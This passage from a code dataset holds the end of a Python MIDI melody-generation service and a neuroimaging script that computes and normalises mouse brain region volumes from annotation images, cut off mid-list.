key_offset_dictionary: A mapping of each musical key in relation to\n key of C. This should be in the form of a python dictionary.\n \"\"\"\n\n return key_offset_dictionary.get(input_key)\n\n# Execute Code ---------------------------------------------------------\n\n\noutput_key = \"C\" # From Service #1\noutput_time_signature = 4, 4 # From Service #1\n\n# Create new bar.\n\noutput_bar = Bar(output_key, output_time_signature)\n\n# Pull a note pitch from service #2.\n\nfirst_note_pitch = \"C\"\n\n# Pull a note length from service #3.\n\nfirst_note_length = 4\n\n# While our output bar is not full, we will keep trying to add notes to it.\n# Return False if there is room in this Bar for another Note True otherwise.\n\nwhile not output_bar.is_full():\n # We try and add the note to our bar.\n\n # If note is rest, we call function place_rest().\n\n if first_note_pitch == \"r\":\n output_bar.place_rest(first_note_length)\n\n # If note is note, we call function place_notes().\n\n else:\n output_bar.place_notes(first_note_pitch, first_note_length)\n\n # Poll API for another note.\n # Rinse and repeat until bar is full.\n\n # break # Temporary break statement.\n\n# Transpose output bar to a given user key.\n\nkey_to_transpose = 5 # From generate key offset function.\ntranspose_up_or_down = True # True is up, False is down. From Service #1\n\noutput_bar.transpose(str(key_to_transpose), transpose_up_or_down)\n\n# Save as MIDI\n\noutput_beats_per_minute = 120 # From service #1\n\nfile_name = \"josh-test-midi-file\" # From service #1\nmidi_file_suffix = file_name + \"-mélodie.mid\"\nmidi_save_location = \"midi_output/\" + midi_file_suffix\n\nmidi_file_out.write_Bar(midi_save_location, output_bar,\n output_beats_per_minute)\n\n\n\"\"\" lilypond_string = from_Bar(output_bar, showkey=True, showtime=True)\n\n# This feature will only work on a linux machine.\n# Save as lilypond string.\n\npng_file_suffix = file_name + \"-mélodie.png\"\npng_save_location = \"png_output/\" + png_file_suffix\n\nto_png(lilypond_string, png_file_suffix) # Exports lilypond string to png.\n\"\"\"\n\n\n# Deprecated Functions -------------------------------------------------\n\n\ndef transpose_pitch(raw_note_pitch, transposed_key_value=0):\n \"\"\" This function takes a raw note pitch and our transposed key value,\n and will transpose the output accordingly, adding a new octave flag if\n necessary.\n\n - Check to see if the raw note pitch is a musical note, or a rest.\n - Check if our value is out of bounds.\n - Transpose objects needing no octave flag.\n - Transpose objects needing a lower octave flag.\n - Transpose objects needing a higher object flag.\n - Return our transposed note pitch.\n\n Keyword Arguments:\n raw_note_pitch: This is the randomly generated note pitch from\n service #2.\n\n transposed_key_value: This is the transposed key value, AKA the\n output from the function in service #1 - 'generate_key_offset'. This\n defaults to 0 - the key of F chromatic.\n \"\"\"\n transposed_ova = \"\"\n\n if raw_note_pitch == \"r\":\n transposed_pitch = \"r\"\n\n elif raw_note_pitch < 0 or raw_note_pitch > 13:\n raise ValueError(\"You should enter a value between 1 and 13.\")\n\n # If raw note pitch is between 1 and 12, we don't add an octave flag.\n\n elif 1 <= (raw_note_pitch + transposed_key_value) <= 12:\n transposed_pitch = raw_note_pitch + transposed_key_value\n\n # If note pitch is transposed lower than our pitch range, add -1 ova flag.\n\n elif (raw_note_pitch + transposed_key_value) < 1:\n transposed_pitch = raw_note_pitch + transposed_key_value + 12\n transposed_ova = \",\"\n\n # If note pitch is transposed higher than our pitch range, add +1 ova flag.\n\n elif raw_note_pitch + transposed_key_value > 12:\n transposed_pitch = raw_note_pitch + transposed_key_value - 12\n transposed_ova = \"'\"\n\n else:\n raise TypeError(\"\")\n\n return transposed_pitch, transposed_ova\n","sub_path":"src/service4/service4.py","file_name":"service4.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"145445932","text":"import os\r\nimport numpy as np\r\nimport nibabel as nib\r\nimport pandas as pd\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport glob\r\nimport csv\r\nfrom scipy.stats import ttest_ind\r\nfrom statsmodels.stats.multitest import multipletests\r\nfrom pathlib import Path\r\nimport numpy_indexed as npi\r\nfrom functions import remap_3D\r\nfrom functions import save_image\r\nfrom dipy.align.imwarp import SymmetricDiffeomorphicRegistration\r\nfrom dipy.align.imwarp import DiffeomorphicMap\r\nfrom dipy.align.metrics import CCMetric\r\nfrom compress_pickle import dump, load\r\nimport pathlib\r\nimport seaborn as sns\r\n\r\n# ce mi mice\r\n# WT30, noWT30, selectively noWT30\r\n\r\n\r\n## Function to compute volumes for image\r\ndef image2volumetable(image_path):\r\n\r\n\r\n # Compute voxel numbers and volumes and output to table\r\n mouse_mask_image = nib.load(image_path)\r\n mouse_mask_image_array = mouse_mask_image.get_fdata()\r\n [mouse_volume_integer, mouse_voxel_number] = np.unique(np.int64(np.round(mouse_mask_image_array)),\r\n return_counts=True)\r\n\r\n # get voxel volume\r\n # voxel_volume = np.linalg.det(mouse_mask_image.get_qform())\r\n voxel_volume = np.prod(mouse_mask_image.header['pixdim'][1:4]) # should be in mm^3\r\n\r\n mouse_volume = mouse_voxel_number * voxel_volume\r\n mouse_table_reference = pd.DataFrame(\r\n {'Mouse': 'allen', 'VolumeInteger': mouse_volume_integer, 'VoxelNumber': mouse_voxel_number,\r\n 'Volume': mouse_volume})\r\n\r\n # Remove later\r\n VTA_volume = mouse_voxel_number[mouse_volume_integer == 1241]\r\n print(f'Image path = {image_path}, while VTA volume is {VTA_volume}')\r\n\r\n # print number of nonzero volumes\r\n print(mouse_table_reference.shape[0])\r\n print(np.sum(mouse_table_reference['Volume'] != 0))\r\n print(np.sum(mouse_table_reference['Volume'][mouse_table_reference['VolumeInteger'] != 0]))\r\n\r\n # Attach parent path to volumes to table - volumes which are not in structure graph are removed\r\n mouse_table_reference = pd.merge(left=structure, right=mouse_table_reference,\r\n left_on='id_custom', right_on='VolumeInteger', how='outer')\r\n mouse_table_reference.loc[np.isnan(mouse_table_reference['VoxelNumber']), 'VoxelNumber'] = 0\r\n mouse_table_reference.loc[np.isnan(mouse_table_reference['Volume']), 'Volume'] = 0\r\n\r\n # print number of nonzero volumes remaining after merge, which should be the same\r\n print(np.sum(mouse_table_reference['Volume'] != 0))\r\n mouse_table_reference['isLowestLevel'] = np.logical_not(np.isnan(mouse_table_reference['VolumeInteger']))\r\n rootVol = np.array(mouse_table_reference.loc[mouse_table_reference['name'] == 'root', 'Volume'])\r\n print(f'Root volume before addition is {rootVol}')\r\n\r\n # Fill in structures without a volume by summing relevant lower level structures\r\n for iVolume in range(mouse_table_reference.shape[0]):\r\n # only include structures with volumes here\r\n if (not np.isnan(mouse_table_reference.loc[iVolume, 'VolumeInteger'])) & isinstance(\r\n mouse_table_reference.loc[iVolume, 'structure_id_path_custom'], str):\r\n for iParent in list(\r\n map(int, mouse_table_reference.loc[iVolume, 'structure_id_path_custom'].strip('][').split(', ')))[\r\n :-1]:\r\n # Add volume to each parent\r\n mouse_table_reference.loc[mouse_table_reference['id_custom'] == iParent, 'Volume'] += \\\r\n mouse_table_reference.loc[iVolume, 'Volume']\r\n mouse_table_reference.loc[mouse_table_reference['id_custom'] == iParent, 'VoxelNumber'] += \\\r\n mouse_table_reference.loc[iVolume, 'VoxelNumber']\r\n rootVol = np.array(mouse_table_reference.loc[mouse_table_reference['name'] == 'root', 'Volume'])\r\n print(f'Root volume after addition is {rootVol}')\r\n\r\n return mouse_table_reference\r\n\r\n\r\n# Define\r\ndata_path = os.path.join('Data', 'Mouse', 'Processed_Old')\r\ndata_new_path = os.path.join('Data', 'Mouse', 'Processed')\r\nreference_path = os.path.join('Data', 'Mouse', 'Reference')\r\nanalysis_path = os.path.join('Data', 'Mouse', 'Analysis')\r\npername_merged_path = os.path.join('..', 'cell-counting', 'pername_merged_table.csv')\r\nmouse_path_list = glob.glob(os.path.join(data_path, '*', '*invsynned*cerebellum_lobular.nii.gz'))\r\ncomb_str = 'main' #########################################\r\nreference_structure_path = os.path.join(reference_path, 'structure_graph_plus' + '_' + comb_str + '.csv')\r\nvoxel_reference_volume = 0.000125\r\nvoxel_volume = 0.000125\r\nannotation_path = os.path.join(reference_path, 'annotation_25_reoriented.nii.gz')\r\nannotation_image = nib.load(annotation_path)\r\nannotation = annotation_image.get_fdata()\r\nannotation_lowLevel_list = list(np.unique(annotation))\r\nnIterBootstrap = 1 #####################################################################################################\r\nvolInt_hemispheres = [1101, 354, 511, 219, 1041]\r\nsn_ids = [54, 268, 2001] # compact and reticular respectively\r\n\r\n# Follows\r\nnMouse = len(mouse_path_list)\r\nstructure = pd.read_csv(reference_structure_path)\r\npername_merged_table = pd.read_csv(pername_merged_path)\r\nPath(os.path.join(analysis_path, 'perstructure')).mkdir(parents=True, exist_ok=True)\r\n\r\n# Reference volumes\r\nreference_table = image2volumetable(annotation_path)\r\n\r\n# Fill in reference additional reference volumes explicitly\r\nreference_table.loc[reference_table['name'] == 'cerebellum lobules I-III', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Lingula (I)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Lobule II', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Lobule III', 'Volume'])\r\nreference_table.loc[reference_table['name'] == 'cerebellum lobules VI-VII', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Declive (VI)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Simple lobule', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Folium-tuber vermis (VII)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Paramedian lobule', 'Volume'])\r\nreference_table.loc[reference_table['name'] == 'cerebellum lobules VIII-IX', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Pyramus (VIII)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Copula pyramidis', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Uvula (IX)', 'Volume'])\r\nreference_table.loc[reference_table['name'] == 'cerebellum vestibulo', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Nodulus (X)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Paraflocculus', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Flocculus', 'Volume'])\r\nreference_table.loc[reference_table['name'] == 'cerebellum hemispheres', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Simple lobule', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Paramedian lobule', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Crus 1', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Crus 2', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Copula pyramidis', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Flocculus', 'Volume'])\r\nannotation_hemispheres = np.where(np.isin(annotation, volInt_hemispheres))\r\nannotation_brain = np.where(annotation > 0)\r\nmid_LR_image = annotation.shape[0] / 2\r\nmid_LR_hemispheres = np.mean(annotation_hemispheres[0])\r\nmid_LR_brain = np.mean(annotation_brain[0])\r\n# print(f'Mid LR of hemispheres = {mid_LR_hemispheres}, '\r\n# f'mid LR of image is {mid_LR_image}, '\r\n# f'mid LR of brain is {mid_LR_brain}')\r\nreference_table.loc[reference_table['name'] == 'cerebellum left hemisphere', 'Volume'] = \\\r\n np.sum(annotation_hemispheres[0] <= mid_LR_brain) * voxel_reference_volume\r\nreference_table.loc[reference_table['name'] == 'cerebellum right hemisphere', 'Volume'] = \\\r\n np.sum(annotation_hemispheres[0] > mid_LR_brain) * voxel_reference_volume\r\n\r\nreference_table.to_csv(os.path.join(analysis_path, 'reference_volumes_mouse'))\r\n\r\nreference_table['in_cerebellum'] = False\r\nreference_table['nPath'] = 0\r\nfor iVolume in range(reference_table.shape[0]):\r\n if isinstance(reference_table.loc[iVolume, 'structure_id_path_custom'], str):\r\n structure_id_path_custom = list(map(int, reference_table.loc[iVolume, 'structure_id_path_custom'].strip('][').split(', ')))\r\n reference_table.loc[iVolume, 'in_cerebellum'] = 1186 in structure_id_path_custom\r\n reference_table.loc[iVolume, 'nPath'] = len(structure_id_path_custom)\r\nreference_cerebellum_table = reference_table[reference_table['in_cerebellum']][\r\n ['name', 'acronym', 'id_custom', 'structure_id_path_custom', 'VoxelNumber', 'Volume']]\r\nreference_cerebellum_table.to_csv(os.path.join(analysis_path, 'reference_volumes_cerebellum_mouse.csv'))\r\n\r\nreference_table['in_sn'] = False\r\nfor iVolume in range(reference_table.shape[0]):\r\n if isinstance(reference_table.loc[iVolume, 'structure_id_path_custom'], str):\r\n reference_table.loc[iVolume, 'in_sn'] = 2001 in list(\r\n map(int, reference_table.loc[iVolume, 'structure_id_path_custom'].strip('][').split(', ')))\r\nreference_sn_table = reference_table[reference_table['in_sn']][\r\n ['name', 'acronym', 'id_custom', 'structure_id_path_custom', 'VoxelNumber', 'Volume']]\r\nreference_sn_table.to_csv(os.path.join(analysis_path, 'reference_volumes_sn_mouse.csv'))\r\n\r\n# get lowest level volume integers\r\nlowestLevel_volInt_list = list(reference_table.loc[reference_table['isLowestLevel'], 'VolumeInteger'])\r\nlowestLevel_volInt_ce_list = list()\r\nlowestLevel_volInt_mi_list = list()\r\nfor volInt in lowestLevel_volInt_list:\r\n id_custom_path = list(map(int, reference_table.loc[reference_table['id_custom'] == volInt, 'structure_id_path_custom'].iloc[0].strip('][').split(', ')))\r\n if np.isin(1186, id_custom_path):\r\n lowestLevel_volInt_ce_list.append(int(volInt))\r\n if np.isin(834, id_custom_path):\r\n lowestLevel_volInt_mi_list.append(int(volInt))\r\nlowestLevel_volInt_ce_list = list(set(lowestLevel_volInt_ce_list) - set([1186]))\r\nlowestLevel_volInt_mi_list = list(set(lowestLevel_volInt_mi_list) - set([834]))\r\nlowestLevel_volInt_mice_list = lowestLevel_volInt_mi_list + lowestLevel_volInt_ce_list\r\nlowestLevel_volInt_ceSN_list = lowestLevel_volInt_ce_list + [54, 268] # 1241 is VTA, this is manually corrected selection, might include some higher order structures still however\r\n\r\n\r\n\r\nmouse_table_list = list()\r\nfor iMouse, Mouse in enumerate(mouse_path_list):\r\n subject = Mouse.split(os.path.sep)[-2]\r\n print(Mouse)\r\n print(subject)\r\n mouse_table = image2volumetable(Mouse)\r\n mouse_table.to_csv(os.path.join(analysis_path, subject + '_volumes_mouse.csv'))\r\n\r\n mouse_table['Mouse'] = subject\r\n mouse_table['Genotype'] = subject.split('_')[0]\r\n mouse_table['Sex'] = subject.split('_')[-1]\r\n mouse_table.loc[mouse_table['Sex'] != 'female', 'Sex'] = 'male'\r\n mouse_table = mouse_table[['Mouse', 'Genotype', 'Sex', 'name', 'acronym', 'id_custom', 'structure_id_path_custom',\r\n 'VoxelNumber', 'Volume']]\r\n\r\n mouse_table_list.append(mouse_table)\r\n\r\nmouse_table_all = pd.concat(mouse_table_list, ignore_index=True)\r\n\r\nreference_table['rVolume'] = reference_table['Volume']\r\noutput_table_all = pd.merge(left=mouse_table_all,\r\n right=reference_table.loc[:, ['id_custom', 'name', 'rVolume', 'include_in_test']],\r\n left_on=['id_custom', 'name'],\r\n right_on=['id_custom', 'name'],\r\n how='right')\r\n\r\n####################################################### are subjects the same for index and assigned?\r\n# Fill in reference additional reference volumes explicitly\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum lobules I-III', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Lingula (I)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Lobule II', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Lobule III', 'Volume'])\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum lobules VI-VII', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Declive (VI)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Simple lobule', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Folium-tuber vermis (VII)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Paramedian lobule', 'Volume'])\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum lobules VIII-IX', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Pyramus (VIII)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Copula pyramidis', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Uvula (IX)', 'Volume'])\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum vestibulo', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Nodulus (X)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Paraflocculus', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Flocculus', 'Volume'])\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum hemispheres', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Simple lobule', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Paramedian lobule', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Crus 1', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Crus 2', 'Volume']) + \\\r\n np.array(\r\n output_table_all.loc[output_table_all['name'] == 'Copula pyramidis', 'Volume']) # [1101, 354, 511, 219, 1041]\r\nfor iMouse, Mouse in enumerate(mouse_path_list):\r\n subject = Mouse.split(os.path.sep)[-2]\r\n print(f'LR hemisphere calculation, subject = {subject}')\r\n\r\n # load corrected annotation in native space\r\n mouse_image = nib.load(Mouse)\r\n mouse_image_array = mouse_image.get_fdata()\r\n\r\n # load flirt\r\n flirt_path = os.path.join(data_path, subject, 'FLIRT', subject + '_to_allen_model_warpaffine.mat')\r\n with open(flirt_path, 'r') as f:\r\n txt = f.read()\r\n flirt = np.array([[float(num) for num in item.split()] for item in txt.split('\\n')[:-1]])\r\n # print(flirt)\r\n\r\n # calculate voxel center and flirted coordinate center\r\n mouse_voxel_image_center = np.array(list(np.array(mouse_image.shape) / 2) + [1])\r\n mouse_voxel_brain_center = np.array(list(np.mean(np.where((mouse_image_array > 0)), axis=1)) + [1])\r\n annotation_hemispheres = np.where(np.isin(mouse_image_array.astype(int), volInt_hemispheres))\r\n mouse_voxel_hemisphere_center = np.array(list(np.mean(annotation_hemispheres, axis=1)) + [1])\r\n\r\n mouse_flirted_image_center = flirt.dot(mouse_image.affine.dot(mouse_voxel_image_center))\r\n mouse_flirted_brain_center = flirt.dot(mouse_image.affine.dot(mouse_voxel_brain_center))\r\n mouse_flirted_hemisphere_center = flirt.dot(mouse_image.affine.dot(mouse_voxel_hemisphere_center))\r\n\r\n # print(f'center_voxel_image = {mouse_voxel_image_center}, ')\r\n # print(f'center_voxel_brain = {mouse_voxel_brain_center}, ')\r\n # print(f'center_voxel_hemispheres = {mouse_voxel_hemisphere_center}')\r\n #\r\n # print(f'center_flirted_image = {mouse_flirted_image_center}, ')\r\n # print(f'center_flirted_brain = {mouse_flirted_brain_center}, ')\r\n # print(f'center_flirted_hemispheres = {mouse_flirted_hemisphere_center}')\r\n\r\n annotation_hemispheres_L = np.empty(len(annotation_hemispheres[0]))\r\n annotation_hemispheres_L[:] = False\r\n for iPoint in range(len(annotation_hemispheres[0])):\r\n iPoint_voxCoord = np.array([annotation_hemispheres[0][iPoint],\r\n annotation_hemispheres[1][iPoint],\r\n annotation_hemispheres[2][iPoint], 1])\r\n iPoint_Coord = mouse_image.affine.dot(iPoint_voxCoord)\r\n # iPoint_Coord[3] = 1\r\n iPoint_flirted_Coord = flirt.dot(iPoint_Coord)\r\n\r\n # print(f'mouse_flirted_brain_center = {mouse_flirted_brain_center}, ')\r\n # print(f'iPoint_flirted_Coord = {iPoint_flirted_Coord}, ')\r\n annotation_hemispheres_L[iPoint] = iPoint_flirted_Coord[0] < mouse_flirted_brain_center[0]\r\n annotation_hemispheres_R = np.logical_not(annotation_hemispheres_L)\r\n\r\n output_table_all.loc[np.logical_and(output_table_all['name'] == 'cerebellum left hemisphere',\r\n output_table_all['Mouse'] == subject), 'Volume'] = \\\r\n np.sum(annotation_hemispheres_L) * voxel_reference_volume\r\n output_table_all.loc[np.logical_and(output_table_all['name'] == 'cerebellum right hemisphere',\r\n output_table_all['Mouse'] == subject), 'Volume'] = \\\r\n np.sum(annotation_hemispheres_R) * voxel_reference_volume\r\n\r\n # annotation_hemispheres_flirtedRigid = annotation_hemispheres[0]\r\n # annotation_flirted_path = os.path.join(data_path, subject, 'FLIRT', subject + '_inmasked_flirted.nii.gz') ######## different reference used! change to reference\r\n # annotation_flirted_image = nib.load(annotation_flirted_path)\r\n # annotation_flirtedRigid_path = os.path.join(data_new_path, subject, subject + '_annotation_flirtedRigid.nii.gz') ######## different reference used! change to reference\r\n # annotation_flirtedRigid_image = nib.load(annotation_flirtedRigid_path)\r\n # annotation_or_path = os.path.join(data_new_path, subject, subject + '_annotation.nii.gz') ######## different reference used! change to reference\r\n # annotation_or_image = nib.load(annotation_or_path)\r\n # annotation_flirted = annotation_flirted_image.get_fdata()\r\n # print(annotation_flirted_image.affine)\r\n # annotation_flirted_hemispheres = np.where(np.isin(annotation_flirted.astype(int), volInt_hemispheres))\r\n # LR_center_flirted_image = annotation_flirted_image.affine.dot(\r\n # np.array(list(np.array(annotation_flirted_image.shape) / 2) + [1]))\r\n # LR_center_flirted_brain = annotation_flirted_image.affine.dot(\r\n # np.array(list(np.mean(np.where(annotation_flirted > 0), axis=1)) + [1]))\r\n # LR_center_flirted_hemispheres = annotation_flirted_image.affine.dot(\r\n # np.array(list(np.mean(annotation_flirted_hemispheres, axis=1)) + [1]))\r\n\r\n # flirtRigid_path = os.path.join(data_new_path, subject, subject + '_flirtRigid.mat')\r\n # with open(flirtRigid_path, 'r') as f:\r\n # txt = f.read()\r\n # flirtRigid = np.array([[float(num) for num in item.split()] for item in txt.split('\\n')[:-1]])\r\n # print(flirtRigid)\r\n\r\n # mouse_masked_flirted_syn_path = os.path.join(data_new_path, subject, subject + '_flirted_syn.pickle.gz')\r\n # with open(mouse_masked_flirted_syn_path, 'rb') as f:\r\n # [mapping, metric, level_iters, sdr] = load(f, compression='gzip')\r\n\r\noutput_table_all['VolumeNormalized'] = output_table_all['Volume'] / output_table_all['rVolume']\r\n\r\n# For each subject add mask volumes for normalization\r\noutput_table_all['rootVolume'] = np.nan\r\nfor subject in np.unique(output_table_all['Mouse']):\r\n output_table_all.loc[output_table_all['Mouse'] == subject, 'rootVolume'] = float(output_table_all.loc[\r\n np.logical_and(\r\n output_table_all[\r\n 'Mouse'] == subject,\r\n output_table_all[\r\n 'name'] == 'root'), 'Volume'])\r\n\r\noutput_table_all['VolumeRootNormalized'] = output_table_all['Volume'] / output_table_all['rootVolume']\r\n\r\n\r\n# Writing output_table_all\r\noutput_table_all_copy = output_table_all.copy()\r\noutput_table_all = pd.merge(left=output_table_all, right=reference_table[['id_custom', 'in_cerebellum', 'nPath']],\r\n left_on='id_custom', right_on='id_custom') # add in_cerebellum column\r\n\r\n# For each structure calculate WT_30_female percentual difference\r\n# For each structure calculate mean with or without WT_30 and normalize VolumeRootNormalized with mean\r\ngrouped = output_table_all.groupby('name')\r\ngroup_list = list()\r\ngroup_WTmean_list = list()\r\nfor name, group in grouped:\r\n # print(f'name={name}')\r\n\r\n vol_WT30 = group.loc[group['Mouse'] == 'WT_30_female', 'Volume'].iloc[0]\r\n vol_mean = np.mean(group.loc[np.logical_and(np.logical_and(group['Mouse'] != 'WT_30_female', group['Genotype'] == 'WT'), group['Mouse'] != 'WT_50'), 'Volume'])\r\n perc_diff = ((vol_mean - vol_WT30) / vol_mean) * 100\r\n\r\n # get id_custom for name\r\n id_custom = group['id_custom'].iloc[0]\r\n acronym = group['acronym'].iloc[0]\r\n\r\n group_list.append(pd.DataFrame({'name': [name],\r\n 'id_custom': [id_custom],\r\n 'WT30_perc_diff' : [perc_diff]}))\r\n\r\n if group['in_cerebellum'].iloc[0] | np.any(np.isin(group['id_custom'], sn_ids)):\r\n WT_mean = np.mean(group.loc[group['Genotype'] == 'WT', 'VolumeRootNormalized'])\r\n WT_30_excluded = False\r\n else:\r\n WT_mean = np.mean(group.loc[np.logical_and(group['Mouse'] != 'WT_30_female', group['Genotype'] == 'WT'), 'VolumeRootNormalized'])\r\n WT_30_excluded = True\r\n VolumeRootNormalizedWTmean = list((group['VolumeRootNormalized'] / WT_mean) * 100)\r\n\r\n name_list = list()\r\n id_custom_list = list()\r\n WT_30_excluded_list = list()\r\n WT_mean_list = list()\r\n for i in range(len(VolumeRootNormalizedWTmean)):\r\n name_list.append(name)\r\n id_custom_list.append(id_custom)\r\n WT_30_excluded_list.append(WT_30_excluded)\r\n WT_mean_list.append(WT_mean)\r\n group_WTmean_list.append(pd.DataFrame({'Mouse': list(group['Mouse']),\r\n 'name': name_list,\r\n 'id_custom': id_custom_list,\r\n 'WT_mean': WT_mean_list,\r\n 'WT_30_excluded': WT_30_excluded_list,\r\n 'VolumeRootNormalizedWTmean' : VolumeRootNormalizedWTmean}))\r\n\r\ngroup_table = pd.concat(group_list, ignore_index=True)\r\ngroup_table_path = os.path.join(analysis_path, 'WT30_perc_diff.csv')\r\nprint(f'Writing {group_table_path}')\r\ngroup_table = group_table.sort_values(by='WT30_perc_diff')\r\ngroup_table = group_table[np.logical_not(np.isnan(group_table['WT30_perc_diff']))]\r\ngroup_table = group_table[group_table['id_custom'] != 0]\r\ngroup_table.to_csv(group_table_path)\r\n # print(f'group={group}')\r\ngroup_WTmean_table = pd.concat(group_WTmean_list, ignore_index=True)\r\noutput_table_all = pd.merge(left=output_table_all, right=group_WTmean_table[['Mouse', 'id_custom', 'WT_mean', 'WT_30_excluded',\r\n 'VolumeRootNormalizedWTmean']],\r\n left_on=['Mouse', 'id_custom'], right_on=['Mouse', 'id_custom'])\r\n\r\n\r\n# Filter out non-cerebellar structures in output_table_all\r\n\r\n\r\n# Filter out WT_30 non-cerebellum and SN, or in other words remove WT_30 while keeping all cerebellum and SN\r\nce_or_sn = np.logical_or(output_table_all['in_cerebellum'], np.isin(output_table_all['id_custom'], sn_ids))\r\noutput_table_all_withWT30_path = os.path.join(analysis_path, 'all_volumes_mouse_withWT30.csv')\r\noutput_table_all.to_csv(output_table_all_withWT30_path)\r\noutput_table_all = output_table_all[np.logical_or(output_table_all['Mouse'] != 'WT_30_female', ce_or_sn)] ########################\r\n# output_table_all = output_table_all[output_table_all['Mouse'] != 'WT_30_female'] ########################\r\noutput_table_all_path = os.path.join(analysis_path, 'all_volumes_mouse.csv')\r\nprint(f'Writing {output_table_all_path}')\r\noutput_table_all.to_csv(output_table_all_path)\r\n\r\noutput_table_cerebellum = pd.merge(left=output_table_all_copy, right=reference_table[['id_custom', 'in_cerebellum']],\r\n left_on='id_custom', right_on='id_custom')\r\noutput_table_cerebellum = output_table_cerebellum[output_table_cerebellum['in_cerebellum']]\r\noutput_table_cerebellum = output_table_cerebellum[output_table_cerebellum['rVolume'] != 0]\r\noutput_table_cerebellum = output_table_cerebellum.drop('in_cerebellum', 1)\r\noutput_table_cerebellum.to_csv(os.path.join(analysis_path, 'cerebellum_volumes_mouse.csv'))\r\n\r\noutput_table_cerebellum = pd.merge(left=output_table_all, right=reference_table[['id_custom', 'in_sn']],\r\n left_on='id_custom', right_on='id_custom')\r\noutput_table_cerebellum = output_table_cerebellum[output_table_cerebellum['in_sn']]\r\noutput_table_cerebellum = output_table_cerebellum.drop('in_sn', 1)\r\noutput_table_cerebellum.to_csv(os.path.join(analysis_path, 'sn_volumes_mouse.csv'))\r\n\r\n# In volume table, go through each structure and determine the p-value between genotypes, create a new p-value table\r\nanalysis_pername_path = os.path.join(analysis_path, 'pername_selWT30')\r\nos.makedirs(analysis_pername_path, exist_ok=True)\r\npername_table_path_list = [os.path.join(analysis_pername_path, 'pername_volumes_mouse.csv'),\r\n os.path.join(analysis_pername_path, 'pername_1_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_2_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_3_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_mi_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_ce_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_mice_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_ceSN_volumes_mouse_' + comb_str + '.csv')]\r\npername_cerebellum_table_path_list = [os.path.join(analysis_pername_path, 'pername_cerebellum_volumes_mouse.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_1_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_2_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_3_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_mi_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_ce_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_mice_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_ceSN_cerebellum_volumes_mouse_' + comb_str + '.csv')]\r\npername_sn_table_path_list = [os.path.join(analysis_pername_path, 'pername_sn_volumes_mouse.csv'),\r\n os.path.join(analysis_pername_path, 'pername_1_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 